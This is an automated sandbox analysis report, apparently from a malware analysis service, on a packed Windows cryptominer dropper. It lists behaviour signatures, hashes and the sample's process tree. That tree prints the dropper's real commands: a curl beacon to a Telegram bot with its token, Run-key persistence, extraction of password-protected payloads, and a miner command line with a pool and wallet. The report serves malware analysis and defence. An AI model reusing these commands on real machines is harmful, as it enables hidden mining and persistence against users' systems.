d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b

Analysis

max time kernel
148s
max time network
146s
platform
windows10_x64
resource
win10-en-20211014
submitted
02-12-2021 23:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe
Size

270KB
MD5

3a02ed97f9b92e307275316cc895becd
SHA1

6b8d2ac1c3ceeefd327b2a0fdb1a201bcbec4e51
SHA256

d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b
SHA512

41b66454d36267c5731498f301f37ad1b16f764c5d3857ccccdae4a4b05bb065c92aee7f656b72962736b4cded297b7bfd0f43c553a47838f7bd070890b50232

Score

9^/10

evasion persistence themida

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

7z.exe7z.exeRegHost.exe7z.exe7z.exe

pid process

4660 7z.exe
4496 7z.exe
3240 RegHost.exe
1092 7z.exe
4744 7z.exe

pid	process
4660	7z.exe
4496	7z.exe
3240	RegHost.exe
1092	7z.exe
4744	7z.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bfsvc.exeexplorer.exeexplorer.exebfsvc.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe

Loads dropped DLL 4 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

pid process

4660 7z.exe
4496 7z.exe
1092 7z.exe
4744 7z.exe

pid	process
4660	7z.exe
4496	7z.exe
1092	7z.exe
4744	7z.exe

Themida packer 18 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral1/memory/512-133-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-138-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-140-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-143-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-144-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-146-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-147-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-149-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/512-150-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral1/memory/3428-190-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-191-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-192-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-194-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-195-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-197-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3428-198-0x0000000140000000-0x00000001402AD000-memory.dmp	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bfsvc.exe

pid process

4348 bfsvc.exe
4348 bfsvc.exe

pid	process
4348	bfsvc.exe
4348	bfsvc.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exeRegHost.exe

description	pid	process	target process
PID 4368 set thread context of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 set thread context of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 3240 set thread context of 3880	3240	RegHost.exe	bfsvc.exe
PID 3240 set thread context of 3428	3240	RegHost.exe	explorer.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

explorer.exeexplorer.exe

pid	process
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
512	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe
3428	explorer.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	4660	7z.exe
Token: 35	4660	7z.exe
Token: SeSecurityPrivilege	4660	7z.exe
Token: SeSecurityPrivilege	4660	7z.exe
Token: SeRestorePrivilege	4496	7z.exe
Token: 35	4496	7z.exe
Token: SeSecurityPrivilege	4496	7z.exe
Token: SeSecurityPrivilege	4496	7z.exe
Token: SeRestorePrivilege	1092	7z.exe
Token: 35	1092	7z.exe
Token: SeSecurityPrivilege	1092	7z.exe
Token: SeSecurityPrivilege	1092	7z.exe
Token: SeRestorePrivilege	4744	7z.exe
Token: 35	4744	7z.exe
Token: SeSecurityPrivilege	4744	7z.exe
Token: SeSecurityPrivilege	4744	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4368 wrote to memory of 2424	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4368 wrote to memory of 2424	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4368 wrote to memory of 3288	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4368 wrote to memory of 3288	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 3288 wrote to memory of 4024	3288	cmd.exe	reg.exe
PID 3288 wrote to memory of 4024	3288	cmd.exe	reg.exe
PID 4368 wrote to memory of 4560	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4368 wrote to memory of 4560	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4560 wrote to memory of 4660	4560	cmd.exe	7z.exe
PID 4560 wrote to memory of 4660	4560	cmd.exe	7z.exe
PID 4368 wrote to memory of 4508	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4368 wrote to memory of 4508	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	cmd.exe
PID 4508 wrote to memory of 4496	4508	cmd.exe	7z.exe
PID 4508 wrote to memory of 4496	4508	cmd.exe	7z.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 4348	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	bfsvc.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe
PID 4368 wrote to memory of 512	4368	d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe
"C:\Users\Admin\AppData\Local\Temp\d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot2089260963:AAFL8tXe5zsLHXv-lAd5-jXvIr94QlReMGA/sendMessage?chat_id=-1001325236130&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Microsoft Basic Display Adapter"
2⤵
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
2⤵
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
3⤵
- Adds Run key to start application
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:4560

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:4508

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0x361b4460a88D8c0C9859178B2e5D30DB71536927 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4348

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0x361b4460a88D8c0C9859178B2e5D30DB71536927 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:512

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
4⤵
PID:4356

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
5⤵
- Adds Run key to start application
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:5096

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:5040

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4744

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0x361b4460a88D8c0C9859178B2e5D30DB71536927 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
PID:3880

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0x361b4460a88D8c0C9859178B2e5D30DB71536927 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
40f3871c1f6da0621395148f0e67c53a

SHA1
94d360000c6c2e341b7d822e5bc06c4dba1a7214

SHA256
5927151dc234ad31b1be2b414ebeca078e3db52ca99c489cf17c1f33517a6db4

SHA512
d5fc80dbcdb4a162192875ea5b7b610827779763643b25a96f1e9c422327930399143631c61ec3cb72d23bb0432a60e3c2ba162637f0c5bcb78183fb24158eb7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
42295150b27433a3ee9c04e6a7e92372

SHA1
a5c05322109c662387ab269a1984d8f77742665d

SHA256
0ac0f96423fc91688d0bd9719add1de896430361bd4162c9813e2a151084b09b

SHA512
530ca21e403202582d6f45ddff5eaf3a4b18591a688a31167596ab46e23c9e3a8f489e3be83bedf2fa0fb1908335c9f23e75bb871ae29695a5ae9feca411788c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1BA3P8U7\7z[1].exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4DBU0RWN\RegData_Temp[1].zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNAKBOQY\RegHost_Temp[1].zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YT6ZDZWI\7z[1].dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
31611fc40493d80f33b3dd411aaa4026

SHA1
71004f5959cae1d17caf3604b703b04ea8862316

SHA256
12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

SHA512
f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
31611fc40493d80f33b3dd411aaa4026

SHA1
